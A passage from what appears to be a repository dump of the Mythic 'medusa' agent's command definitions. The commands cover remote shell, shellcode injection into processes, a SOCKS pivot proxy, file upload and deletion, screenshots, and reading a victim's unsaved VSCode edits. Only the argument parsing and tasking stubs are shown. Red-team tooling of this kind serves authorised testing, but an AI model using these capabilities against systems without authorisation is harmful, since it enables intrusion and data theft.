    "content": "from mythic_container.MythicCommandBase import *\nimport json\nfrom mythic_container.MythicRPC import *\nimport sys\n\n\nclass PsFullArguments(TaskArguments):\n    def __init__(self, command_line, **kwargs):\n        super().__init__(command_line, **kwargs)\n        self.args = []\n\n    async def parse_arguments(self):\n        pass\n\n\nclass PsFullCommand(CommandBase):\n    cmd = \"ps_full\"\n    needs_admin = False\n    help_cmd = \"ps_full\"\n    description = \"Get full process listing.\"\n    version = 2\n    author = \"@ajpc500\"\n    attackmapping = [\"T1106\"]\n    supported_ui_features = [\"process_browser:list\"]\n    argument_class = PsFullArguments\n    browser_script = BrowserScript(script_name=\"ps_full\", author=\"@ajpc500\", for_new_ui=True)\n    attributes = CommandAttributes(\n        supported_python_versions=[ \"Python 3.8\" ],\n        supported_os=[ SupportedOS.Windows ],\n    )\n\n    async def create_tasking(self, task: MythicTask) -> MythicTask:\n        task.display_params = \"Getting full process listing\"\n        return task\n\n    async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse:\n        resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True)\n        return resp\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/agent_functions/rm.py",
    "content": "from mythic_container.MythicCommandBase import *\nimport json\nfrom mythic_container.MythicRPC import *\nimport sys\n\n\nclass RmArguments(TaskArguments):\n    def __init__(self, command_line, **kwargs):\n        super().__init__(command_line, **kwargs)\n        self.args = [\n            CommandParameter(\n                name=\"path\",\n                type=ParameterType.String,\n                parameter_group_info=[ParameterGroupInfo(\n                    required=True\n                )],\n                description=\"Read and output the content of a file\",\n            )\n        ]\n\n    async def parse_arguments(self):\n        if len(self.command_line) > 0:\n            if self.command_line[0] == \"{\":\n                temp_json = json.loads(self.command_line)\n                if \"host\" in temp_json:\n                    # this means we have tasking from the file browser rather than the popup UI\n                    # the apfell agent doesn't currently have the ability to do _remote_ listings, so we ignore it\n                    self.add_arg(\"path\", temp_json[\"path\"] + \"/\" + temp_json[\"file\"])\n                else:\n                    self.add_arg(\"path\", temp_json[\"path\"])\n            else:\n                self.add_arg(\"path\", self.command_line)\n        else:\n            raise ValueError(\"Missing arguments\")\n\n\nclass RmCommand(CommandBase):\n    cmd = \"rm\"\n    needs_admin = False\n    help_cmd = \"rm /path/to/file\"\n    description = \"Delete a file or folder\"\n    version = 1\n    author = \"@ajpc500\"\n    attackmapping = [ \"T1485\" ]\n    supported_ui_features = [\"file_browser:remove\"]\n    argument_class = RmArguments\n    browser_script = BrowserScript(script_name=\"ls\", author=\"@its_a_feature_\")\n    attributes = CommandAttributes(\n        supported_python_versions=[\"Python 2.7\", \"Python 3.8\"],\n        supported_os=[SupportedOS.MacOS, SupportedOS.Windows, SupportedOS.Linux ],\n    )\n\n  
  async def create_tasking(self, task: MythicTask) -> MythicTask:\n        task.display_params = \"Deleting \" + str(task.args.get_arg(\"path\"))\n        return task\n\n    async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse:\n        resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True)\n        return resp\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/agent_functions/screenshot.py",
    "content": "from mythic_container.MythicCommandBase import *\nimport json\nimport datetime\nfrom mythic_container.MythicRPC import *\nfrom mythic_container.PayloadBuilder import *\n\nclass ScreenshotArguments(TaskArguments):\n    def __init__(self, command_line, **kwargs):\n        super().__init__(command_line, **kwargs)\n        self.args = []\n\n    async def parse_arguments(self):\n        pass\n\n\nclass ScreenshotCommand(CommandBase):\n    cmd = \"screenshot\"\n    needs_admin = False\n    help_cmd = \"screenshot\"\n    description = \"Use the built-in CGDisplay API calls to capture the display and send it back over the C2 channel.\"\n    version = 1\n    author = \"@ajpc500\"\n    parameters = []\n    attackmapping = [\"T1113\"]\n    argument_class = ScreenshotArguments\n    browser_script = BrowserScript(script_name=\"screenshot\", author=\"@its_a_feature_\", for_new_ui=True)\n    attributes = CommandAttributes(\n        filter_by_build_parameter={\n            \"python_version\": \"Python 2.7\"\n        },\n        supported_python_versions=[\"Python 2.7\"],\n        supported_os=[ SupportedOS.MacOS ]\n    )\n\n    async def create_tasking(self, task: MythicTask) -> MythicTask:\n        resp = await MythicRPC().execute(\"create_artifact\", task_id=task.id,\n            artifact=\"CG.CGWindowListCreateImage(region, CG.kCGWindowListOptionOnScreenOnly, CG.kCGNullWindowID, CG.kCGWindowImageDefault)\",\n            artifact_type=\"API Called\",\n        )\n        return task\n\n    async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse:\n        resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True)\n        return resp\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/agent_functions/shell.py",
    "content": "from mythic_container.MythicCommandBase import *\nfrom mythic_container.MythicRPC import *\n\n\nclass ShellArguments(TaskArguments):\n    def __init__(self, command_line, **kwargs):\n        super().__init__(command_line, **kwargs)\n        self.args = [\n            CommandParameter(\n                name=\"command\", \n                type=ParameterType.String, \n                description=\"Command to run\"\n            ),\n        ]\n\n    async def parse_arguments(self):\n        if len(self.command_line) == 0:\n            raise ValueError(\"Must supply a command to run\")\n        self.add_arg(\"command\", self.command_line)\n\n    async def parse_dictionary(self, dictionary_arguments):\n        self.load_args_from_dictionary(dictionary_arguments)\n\nclass ShellCommand(CommandBase):\n    cmd = \"shell\"\n    needs_admin = False\n    help_cmd = \"shell {command}\"\n    description = \"This runs {command} in a terminal.\"\n    version = 1\n    author = \"@ajpc500\"\n    attackmapping = [\"T1059\"]\n    argument_class = ShellArguments\n    attributes = CommandAttributes(\n        supported_python_versions=[\"Python 2.7\", \"Python 3.8\"],\n        supported_os=[ SupportedOS.MacOS, SupportedOS.Linux, SupportedOS.Windows ]\n    )\n\n    async def create_tasking(self, task: MythicTask) -> MythicTask:\n        task.display_params = task.args.get_arg(\"command\")\n        return task\n\n    async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse:\n        resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True)\n        return resp\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/agent_functions/shinject.py",
    "content": "from mythic_container.MythicCommandBase import *\nfrom mythic_container.MythicRPC import *\nimport json\nimport sys\nimport base64\n\nclass ShinjectArguments(TaskArguments):\n    def __init__(self, command_line, **kwargs):\n        super().__init__(command_line, **kwargs)\n        self.args = [\n            CommandParameter(\n                name=\"shellcode\", \n                type=ParameterType.File, \n                description=\"Shellcode to inject\"\n            ),\n            CommandParameter(\n                name=\"process_id\",\n                type=ParameterType.Number,\n                description=\"ID of process to inject into\",\n            ),\n        ]\n\n    async def parse_arguments(self):\n        if len(self.command_line) > 0:\n            if self.command_line[0] == \"{\":\n                self.load_args_from_json_string(self.command_line)\n            else:\n                raise ValueError(\"Missing JSON arguments\")\n        else:\n            raise ValueError(\"Missing arguments\")\n\n\nclass ShinjectCommand(CommandBase):\n    cmd = \"shinject\"\n    needs_admin = False\n    help_cmd = \"shinject\"\n    description = (\n        \"Inject shellcode from local file into target process\"\n    )\n    version = 1\n    supported_ui_features = [\"process_browser:inject\"]\n    author = \"@ajpc500\"\n    attackmapping = [ \"T1055\" ]\n\n    argument_class = ShinjectArguments\n    attributes = CommandAttributes(\n        supported_python_versions=[\"Python 2.7\", \"Python 3.8\"],\n        supported_os=[ SupportedOS.Windows ]\n    )\n\n    async def create_tasking(self, task: MythicTask) -> MythicTask:\n        try:\n            file_resp = await MythicRPC().execute(\n                \"get_file\", \n                task_id=task.id,\n                file_id=task.args.get_arg(\"shellcode\"),\n                get_contents=False\n            )\n            if file_resp.status == MythicStatus.Success:\n                original_file_name = 
file_resp.response[0][\"filename\"]\n\n                if len(file_resp.response) > 0:\n                    task.display_params = \"Injecting {} into PID {}\".format(original_file_name, task.args.get_arg(\"process_id\"))\n                elif len(file_resp.response) == 0:\n                    raise Exception(\"Failed to find the named file. Have you uploaded it before? Did it get deleted?\")\n            \n            file_resp = await MythicRPC().execute(\"update_file\",\n                file_id=task.args.get_arg(\"shellcode\"),\n                delete_after_fetch=True,\n                comment=\"Uploaded into memory for shinject\"\n            )\n        except Exception as e:\n            raise Exception(\"Error from Mythic: \" + str(sys.exc_info()[-1].tb_lineno) + str(e))    \n        \n        return task\n\n    async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse:\n        resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True)\n        return resp\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/agent_functions/sleep.py",
    "content": "from mythic_container.MythicCommandBase import *\nfrom mythic_container.MythicRPC import *\nimport json\n\ndef positiveTime(val):\n    if val < 0:\n        raise ValueError(\"Value must be positive\")\n\nclass SleepArguments(TaskArguments):\n    def __init__(self, command_line, **kwargs):\n        super().__init__(command_line, **kwargs)\n        self.args = [\n            CommandParameter(\n                name=\"jitter\",\n                type=ParameterType.Number,\n                validation_func=positiveTime,\n                default_value=-1,\n                parameter_group_info=[ParameterGroupInfo(\n                    required=False,\n                    ui_position=2\n                )],\n                description=\"Percentage of C2's interval to use as jitter\",\n            ),\n            CommandParameter(\n                name=\"seconds\",\n                type=ParameterType.Number,\n                parameter_group_info=[ParameterGroupInfo(\n                    required=True,\n                    ui_position=1\n                )],\n                validation_func=positiveTime,\n                description=\"Number of seconds between checkins\",\n            ),\n        ]\n\n    async def parse_arguments(self):\n        if self.command_line[0] != \"{\":\n            pieces = self.command_line.split(\" \")\n            if len(pieces) == 1:\n                self.add_arg(\"seconds\", pieces[0])\n                self.remove_arg(\"jitter\")\n            elif len(pieces) == 2:\n                self.add_arg(\"seconds\", pieces[0])\n                self.add_arg(\"jitter\", pieces[1])\n            else:\n                raise Exception(\"Wrong number of parameters, should be 1 or 2\")\n        else:\n            self.load_args_from_json_string(self.command_line)\n\nclass SleepCommand(CommandBase):\n    cmd = \"sleep\"\n    needs_admin = False\n    help_cmd = \"sleep seconds jitter_percentage\"\n    description = \"set sleep and jitter\"\n    
version = 1\n    author = \"@ajpc500\"\n    attackmapping = []\n    argument_class = SleepArguments\n    attributes = CommandAttributes(\n        supported_python_versions=[\"Python 2.7\", \"Python 3.8\"],\n        supported_os=[SupportedOS.MacOS, SupportedOS.Windows, SupportedOS.Linux ],\n    )\n\n    async def create_tasking(self, task: MythicTask) -> MythicTask:\n        task.display_params = str(task.args.get_arg(\"seconds\")) + \"s\"\n        if int(task.args.get_arg(\"jitter\")) != -1:\n            task.display_params += \" with \" + str(task.args.get_arg(\"jitter\")) + \"% jitter\"\n        return task\n\n    async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse:\n        resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True)\n        await SendMythicRPCCallbackUpdate(MythicRPCCallbackUpdateMessage(\n            TaskID=task.Task.ID,\n            SleepInfo=response,\n        ))\n        return resp"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/agent_functions/socks.py",
    "content": "from mythic_container.MythicCommandBase import *\nfrom mythic_container.MythicRPC import *\nimport json\n\nclass SocksArguments(TaskArguments):\n\n    valid_actions = [\"start\", \"stop\"]\n\n    def __init__(self, command_line, **kwargs):\n        super().__init__(command_line, **kwargs)\n        self.args = [\n            CommandParameter(\n                name=\"action\", \n                choices=[\"start\",\"stop\"], \n                parameter_group_info=[ParameterGroupInfo(\n                    required=True\n                )], \n                type=ParameterType.ChooseOne, \n                description=\"Start or stop the socks server.\"\n            ),\n            CommandParameter(\n                name=\"port\", \n                parameter_group_info=[ParameterGroupInfo(\n                    required=False\n                )], \n                type=ParameterType.Number, \n                description=\"Port to start the socks server on.\"\n            ),\n        ]\n\n    async def parse_dictionary(self, dictionary_arguments):\n        self.load_args_from_dictionary(dictionary_arguments)\n\n    async def parse_arguments(self):\n        if len(self.command_line) == 0:\n            raise Exception(\"Must be passed \\\"start\\\" or \\\"stop\\\" commands on the command line.\")\n        try:\n            self.load_args_from_json_string(self.command_line)\n        except:\n            parts = self.command_line.lower().split()\n            action = parts[0]\n            if action not in self.valid_actions:\n                raise Exception(\"Invalid action \\\"{}\\\" given. 
Require one of: {}\".format(action, \", \".join(self.valid_actions)))\n            self.add_arg(\"action\", action)\n            if action == \"start\":\n                port = -1\n                if len(parts) < 2:\n                    port = 7005\n                else:\n                    try:\n                        port = int(parts[1])\n                    except Exception as e:\n                        raise Exception(\"Invalid port number given: {}. Must be int.\".format(parts[1]))\n                self.add_arg(\"port\", port, ParameterType.Number)\n\n\nclass SocksCommand(CommandBase):\n    cmd = \"socks\"\n    needs_admin = False\n    help_cmd = \"socks [action] [port number]\"\n    description = \"Enable SOCKS 5 compliant proxy on the agent such that you may proxy data in from an outside machine into the target network.\"\n    version = 1\n    is_exit = False\n    is_file_browse = False\n    is_process_list = False\n    is_download_file = False\n    is_upload_file = False\n    is_remove_file = False\n    author = \"@ajpc500\"\n    argument_class = SocksArguments\n    attackmapping = [\"T1090\"]\n    attributes = CommandAttributes(\n        supported_python_versions=[\"Python 3.8\", \"Python 2.7\"],\n        supported_os=[SupportedOS.MacOS, SupportedOS.Windows, SupportedOS.Linux ],\n    )\n\n\n\n    async def create_go_tasking(self, taskData: PTTaskMessageAllData) -> PTTaskCreateTaskingMessageResponse:\n        response = PTTaskCreateTaskingMessageResponse(\n            TaskID=taskData.Task.ID,\n            Success=True,\n        )\n        if taskData.args.get_arg(\"action\") == \"start\":\n            resp = await SendMythicRPCProxyStartCommand(MythicRPCProxyStartMessage(\n                TaskID=taskData.Task.ID,\n                PortType=\"socks\",\n                LocalPort=taskData.args.get_arg(\"port\")\n            ))\n\n            if not resp.Success:\n                response.TaskStatus = MythicStatus.Error\n                response.Stderr = 
resp.Error\n                await SendMythicRPCResponseCreate(MythicRPCResponseCreateMessage(\n                    TaskID=taskData.Task.ID,\n                    Response=resp.Error.encode()\n                ))\n            else:\n                response.DisplayParams = \"Started SOCKS5 server on port {}\".format(taskData.args.get_arg(\"port\"))\n        else:\n            resp = await SendMythicRPCProxyStopCommand(MythicRPCProxyStopMessage(\n                TaskID=taskData.Task.ID,\n                PortType=\"socks\",\n                Port=taskData.args.get_arg(\"port\")\n            ))\n            if not resp.Success:\n                response.TaskStatus = MythicStatus.Error\n                response.Stderr = resp.Error\n                await SendMythicRPCResponseCreate(MythicRPCResponseCreateMessage(\n                    TaskID=taskData.Task.ID,\n                    Response=resp.Error.encode()\n                ))\n            else:\n                response.DisplayParams = \"Stopped SOCKS5 server on port {}\".format(taskData.args.get_arg(\"port\"))\n        return response\n\n\n    async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse:\n        resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True)\n        return resp\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/agent_functions/spawn_jxa.py",
    "content": "from mythic_container.MythicCommandBase import *\nfrom mythic_container.MythicRPC import *\nimport json\nimport sys\nimport base64\n\nclass SpawnJxaArguments(TaskArguments):\n    def __init__(self, command_line, **kwargs):\n        super().__init__(command_line, **kwargs)\n        self.args = [\n            CommandParameter(\n                name=\"file\", \n                type=ParameterType.File, \n                description=\"Script file to load\"\n            ),\n            CommandParameter(\n                name=\"language\", \n                type=ParameterType.ChooseOne,\n                choices=[ \"JavaScript\", \"AppleScript\" ],\n                default_value=\"JavaScript\", \n                description=\"Language of script to load\"\n            )\n        ]\n\n    async def parse_arguments(self):\n        if len(self.command_line) > 0:\n            if self.command_line[0] == \"{\":\n                self.load_args_from_json_string(self.command_line)\n            else:\n                raise ValueError(\"Missing JSON arguments\")\n        else:\n            raise ValueError(\"Missing arguments\")\n\n\nclass SpawnJxaCommand(CommandBase):\n    cmd = \"spawn_jxa\"\n    needs_admin = False\n    help_cmd = \"spawn_jxa\"\n    description = (\n        \"Spawn an osascript process and pipe script content to it.\"\n    )\n    version = 1\n    author = \"@ajpc500\"\n    attackmapping = []\n    argument_class = SpawnJxaArguments\n    attributes = CommandAttributes(\n        supported_python_versions=[\"Python 2.7\", \"Python 3.8\"],\n        supported_os=[SupportedOS.MacOS ],\n    )\n\n    async def create_tasking(self, task: MythicTask) -> MythicTask:\n        file_resp = await MythicRPC().execute(\n                \"get_file\", \n                task_id=task.id,\n                file_id=task.args.get_arg(\"file\"),\n                get_contents=False\n            )\n        if file_resp.status == MythicStatus.Success:\n            
original_file_name = file_resp.response[0][\"filename\"]\n            task.display_params = f\"Spawning osascript and loading script: {original_file_name}\"\n        else:\n            raise Exception(\"Failed to register file: \" + file_resp.error)\n        \n        file_resp = await MythicRPC().execute(\"update_file\",\n                file_id=task.args.get_arg(\"file\"),\n                delete_after_fetch=True,\n                comment=\"Uploaded and piped to new osascript process\")\n        \n        \n        return task\n\n    async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse:\n        resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True)\n        return resp\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/agent_functions/unload.py",
    "content": "from mythic_container.MythicCommandBase import *\nfrom mythic_container.MythicRPC import *\nimport json, base64, os\n\nclass UnloadArguments(TaskArguments):\n    def __init__(self, command_line, **kwargs):\n        super().__init__(command_line, **kwargs)\n        self.args = [\n            CommandParameter(\n                name=\"command\", \n                type=ParameterType.ChooseOne, \n                description=\"Command to unload from the agent\",\n                choices_are_all_commands=True,\n                choices_are_loaded_commands=True\n            )\n        ]\n            \n    async def parse_arguments(self):\n        if self.command_line[0] != \"{\":\n            self.add_arg(\"command\", self.command_line)\n        else:\n            self.load_args_from_json_string(self.command_line)\n\n    async def parse_dictionary(self, dictionary_arguments):\n        self.load_args_from_dictionary(dictionary_arguments)\n\n\nclass UnloadCommand(CommandBase):\n    cmd = \"unload\"\n    needs_admin = False\n    help_cmd = \"unload cmd\"\n    description = \"This unloads an existing function from a callback.\"\n    version = 1\n    author = \"@ajpc500\"\n    parameters = []\n    attackmapping = [\"T1030\", \"T1129\"]\n    argument_class = UnloadArguments\n    attributes = CommandAttributes(\n        supported_python_versions=[\"Python 2.7\", \"Python 3.8\"],\n        supported_os=[SupportedOS.MacOS, SupportedOS.Windows, SupportedOS.Linux ],\n    )\n\n    async def create_go_tasking(self, taskData: PTTaskMessageAllData) -> PTTaskCreateTaskingMessageResponse:\n        response = PTTaskCreateTaskingMessageResponse(\n            TaskID=taskData.Task.ID,\n            Success=True,\n        )\n        unload_cmd = taskData.args.get_arg(\"command\")\n        response.DisplayParams = f\"command: {unload_cmd}\"\n        return response\n\n\n    async def process_response(self, task: PTTaskMessageAllData, response: any) -> 
PTTaskProcessResponseMessageResponse:\n        resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True)\n        return resp"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/agent_functions/unload_module.py",
    "content": "from mythic_container.MythicCommandBase import *\nfrom mythic_container.MythicRPC import *\nimport json\nimport sys\nimport base64\n\nclass UnloadModuleArguments(TaskArguments):\n    def __init__(self, command_line, **kwargs):\n        super().__init__(command_line, **kwargs)\n        self.args = [\n            CommandParameter(\n                name=\"module_name\",\n                type=ParameterType.String,\n                description=\"Name of module to load, e.g. cryptography\"\n            )\n        ]\n\n    async def parse_arguments(self):\n        if len(self.command_line) > 0:\n            if self.command_line[0] == \"{\":\n                self.load_args_from_json_string(self.command_line)\n            else:\n                self.add_arg(\"module_name\", self.command_line)\n        else:\n            raise ValueError(\"Missing arguments\")\n\n\nclass UnloadModuleCommand(CommandBase):\n    cmd = \"unload_module\"\n    needs_admin = False\n    help_cmd = \"unload_module [module]\"\n    description = (\n        \"Unload an in-memory Python module from the agent\"\n    )\n    version = 1\n    author = \"@ajpc500\"\n    attackmapping = []\n    argument_class = UnloadModuleArguments\n    attributes = CommandAttributes(\n        supported_python_versions=[\"Python 2.7\", \"Python 3.8\"],\n        supported_os=[SupportedOS.MacOS, SupportedOS.Windows, SupportedOS.Linux ],\n    )\n\n\n    async def create_tasking(self, task: MythicTask) -> MythicTask:        \n        task.display_params = f\"Unloading {task.args.get_arg('module_name')} module\"\n        return task\n\n    async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse:\n        resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True)\n        return resp\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/agent_functions/upload.py",
    "content": "from mythic_container.MythicCommandBase import *\nfrom mythic_container.MythicRPC import *\nimport json, sys, base64\n\n\nclass UploadArguments(TaskArguments):\n    def __init__(self, command_line, **kwargs):\n        super().__init__(command_line, **kwargs)\n        self.args = [\n            CommandParameter(\n                name=\"file\", \n                type=ParameterType.File, \n                description=\"file to upload\"\n            ),\n            CommandParameter(\n                name=\"remote_path\",\n                type=ParameterType.String,\n                description=\"/remote/path/on/victim.txt\",\n            ),\n        ]\n\n    async def parse_arguments(self):\n        if len(self.command_line) == 0:\n            raise ValueError(\"Must supply arguments\")\n        raise ValueError(\"Must supply named arguments or use the modal\")\n\n    async def parse_dictionary(self, dictionary_arguments):\n        self.load_args_from_dictionary(dictionary_arguments)\n\n\nclass UploadCommand(CommandBase):\n    cmd = \"upload\"\n    needs_admin = False\n    help_cmd = \"upload\"\n    description = (\n        \"Upload a file to the target machine by selecting a file from your computer. 
\"\n    )\n    version = 1\n    supported_ui_features = [\"file_browser:upload\"]\n    author = \"@its_a_feature_\"\n    attackmapping = [\"T1132\", \"T1030\", \"T1105\"]\n    argument_class = UploadArguments\n    attributes = CommandAttributes(\n        supported_python_versions=[\"Python 2.7\", \"Python 3.8\"],\n        supported_os=[SupportedOS.MacOS, SupportedOS.Windows, SupportedOS.Linux ],\n    )\n\n\n    async def create_go_tasking(self, taskData: MythicCommandBase.PTTaskMessageAllData) -> MythicCommandBase.PTTaskCreateTaskingMessageResponse:\n        response = MythicCommandBase.PTTaskCreateTaskingMessageResponse(\n            TaskID=taskData.Task.ID,\n            Success=True,\n        )\n        try:\n            file_resp = await SendMythicRPCFileSearch(MythicRPCFileSearchMessage(\n                TaskID=taskData.Task.ID,\n                AgentFileID=taskData.args.get_arg(\"file\")\n            ))\n            if file_resp.Success:\n                if len(file_resp.Files) > 0:\n                    original_file_name = file_resp.Files[0].Filename\n                    if len(taskData.args.get_arg(\"remote_path\")) == 0:\n                        taskData.args.add_arg(\"remote_path\", original_file_name)\n                    elif taskData.args.get_arg(\"remote_path\")[-1] == \"/\":\n                        taskData.args.add_arg(\"remote_path\", taskData.args.get_arg(\"remote_path\") + original_file_name)\n                    response.DisplayParams = f\"{original_file_name} to {taskData.args.get_arg('remote_path')}\"\n                else:\n                    raise Exception(\"Failed to find that file\")\n            else:\n                raise Exception(\"Error from Mythic trying to get file: \" + str(file_resp.Error))            \n        except Exception as e:\n            raise Exception(\"Error from Mythic: \" + str(sys.exc_info()[-1].tb_lineno) + \" : \" + str(e))\n        return response\n\n\n    async def process_response(self, task: 
PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse:\n        resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True)\n        return resp\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/agent_functions/vscode_list_recent.py",
    "content": "from mythic_container.MythicCommandBase import *\nimport json\nfrom mythic_container.MythicRPC import *\nimport sys\n\n\nclass VscodeListRecentArguments(TaskArguments):\n    def __init__(self, command_line, **kwargs):\n        super().__init__(command_line, **kwargs)\n        self.args = [\n            CommandParameter(\n                name=\"db\",\n                type=ParameterType.String,\n                parameter_group_info=[ParameterGroupInfo(\n                    required=False\n                )],\n                default_value=\"\",\n                description=\"Path to VSCode state database\",\n            )\n        ]\n\n    async def parse_arguments(self):\n        if len(self.command_line) > 0:\n            self.add_arg(\"db\", self.command_line)\n        \n    async def parse_dictionary(self, dictionary_arguments):\n        self.load_args_from_dictionary(dictionary_arguments)\n\nclass VscodeListRecentCommand(CommandBase):\n    cmd = \"vscode_list_recent\"\n    needs_admin = False\n    help_cmd = \"vscode_list_recent [state_db_path]\"\n    description = \"Lists recently accessed files/folders in VSCode state database\"\n    version = 1\n    author = \"@ajpc500\"\n    attackmapping = []\n    supported_ui_features = []\n    argument_class = VscodeListRecentArguments\n    browser_script = BrowserScript(script_name=\"vscode_recent\", author=\"@ajpc500\", for_new_ui=True)\n    attributes = CommandAttributes(\n        supported_python_versions=[\"Python 2.7\", \"Python 3.8\"],\n        supported_os=[\n            SupportedOS.MacOS\n        ],\n    )\n\n    async def create_tasking(self, task: MythicTask) -> MythicTask:\n        if task.args.get_arg(\"db\"):\n            task.display_params = \"Listing recent VSCode files from state database at \" + task.args.get_arg(\"db\")\n        else:\n            task.display_params = \"Listing recent VSCode files from state database at '~/Library/Application 
Support/Code/User/globalStorage/state.vscdb'\"\n        return task\n\n    async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse:\n        resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True)\n        return resp\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/agent_functions/vscode_open_edits.py",
    "content": "from mythic_container.MythicCommandBase import *\nimport json\nfrom mythic_container.MythicRPC import *\nimport sys\n\n\nclass VscodeOpenEditsArguments(TaskArguments):\n    def __init__(self, command_line, **kwargs):\n        super().__init__(command_line, **kwargs)\n        self.args = [\n            CommandParameter(\n                name=\"backups_path\",\n                type=ParameterType.String,\n                parameter_group_info=[ParameterGroupInfo(\n                    required=False\n                )],\n                default_value=\"\",\n                description=\"Path to VSCode backups directory\",\n            )\n        ]\n\n    async def parse_arguments(self):\n        if len(self.command_line) > 0:\n            self.add_arg(\"backups_path\", self.command_line)\n        \n    async def parse_dictionary(self, dictionary_arguments):\n        self.load_args_from_dictionary(dictionary_arguments)\n\nclass VscodeOpenEditsCommand(CommandBase):\n    cmd = \"vscode_open_edits\"\n    needs_admin = False\n    help_cmd = \"vscode_open_edits [backups_dir_path]\"\n    description = \"Lists edited files in VSCode that have not been saved.\"\n    version = 1\n    author = \"@ajpc500\"\n    attackmapping = []\n    supported_ui_features = []\n    argument_class = VscodeOpenEditsArguments\n    browser_script = BrowserScript(script_name=\"vscode_edits\", author=\"@ajpc500\", for_new_ui=True)\n    attributes = CommandAttributes(\n        supported_python_versions=[\"Python 2.7\", \"Python 3.8\"],\n        supported_os=[\n            SupportedOS.MacOS\n        ],\n    )\n\n    async def create_tasking(self, task: MythicTask) -> MythicTask:\n        if task.args.get_arg(\"backups_path\"):\n            task.display_params = \"Listing edited and unsaved files in VSCode from backup directory: \" + task.args.get_arg(\"backups_path\")\n        else:\n            task.display_params = \"Listing edited and unsaved files in VSCode from backup directory: 
'~/Library/Application Support/Code/Backups'\"\n        return task\n\n    async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse:\n        resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True)\n        return resp\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/agent_functions/vscode_watch_edits.py",
    "content": "from mythic_container.MythicCommandBase import *\nfrom mythic_container.MythicRPC import *\nimport json\n\n\nclass VscodeWatchEditsArguments(TaskArguments):\n    def __init__(self, command_line, **kwargs):\n        super().__init__(command_line, **kwargs)\n        self.args = [\n            CommandParameter(\n                name=\"backups_path\",\n                type=ParameterType.String,\n                parameter_group_info=[ParameterGroupInfo(\n                    required=False\n                )],\n                description=\"Path of VSCode backups folder \",\n            ),\n            CommandParameter(\n                name=\"seconds\",\n                type=ParameterType.Number,\n                parameter_group_info=[ParameterGroupInfo(\n                    required=False\n                )],\n                default_value=60, \n                description=\"Seconds to wait between polling directory for changes\",\n            )\n        ]\n\n    async def parse_arguments(self):\n        if self.command_line[0] != \"{\":\n            pieces = self.command_line.split(\" \")\n            if len(pieces) == 2:\n                self.add_arg(\"backups_path\", pieces[0])\n                self.add_arg(\"seconds\", pieces[1])\n            else:\n                raise Exception(\"Wrong number of parameters, should be 2\")\n        else:\n            self.load_args_from_json_string(self.command_line)\n\n    async def parse_dictionary(self, dictionary_arguments):\n        self.load_args_from_dictionary(dictionary_arguments)\n\n\nclass VscodeWatchEditsCommand(CommandBase):\n    cmd = \"vscode_watch_edits\"\n    needs_admin = False\n    help_cmd = \"vscode_watch_edits [/path/to/backups/dir]\"\n    description = \"Poll VSCode backups directory for unsaved edits\"\n    version = 1\n    author = \"@ajpc500\"\n    attackmapping = [\"T1083\"]\n    argument_class = VscodeWatchEditsArguments\n    attributes = CommandAttributes(\n        
supported_python_versions=[\"Python 2.7\", \"Python 3.8\"],\n        supported_os=[SupportedOS.MacOS],\n    )\n\n    async def create_tasking(self, task: MythicTask) -> MythicTask:\n        if task.args.get_arg(\"backups_path\"):\n            task.display_params = \"Watching for VSCode edits. Polling '{}' for changes every {} seconds\".format(task.args.get_arg(\"backups_path\"), str(task.args.get_arg(\"seconds\")))\n        else:\n            task.display_params = \"Watching for VSCode edits. Polling '{}' for changes every {} seconds\".format(\"~/Library/Application Support/Code/Backups\", str(task.args.get_arg(\"seconds\")))\n        return task\n\n    async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse:\n        resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True)\n        return resp\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/agent_functions/watch_dir.py",
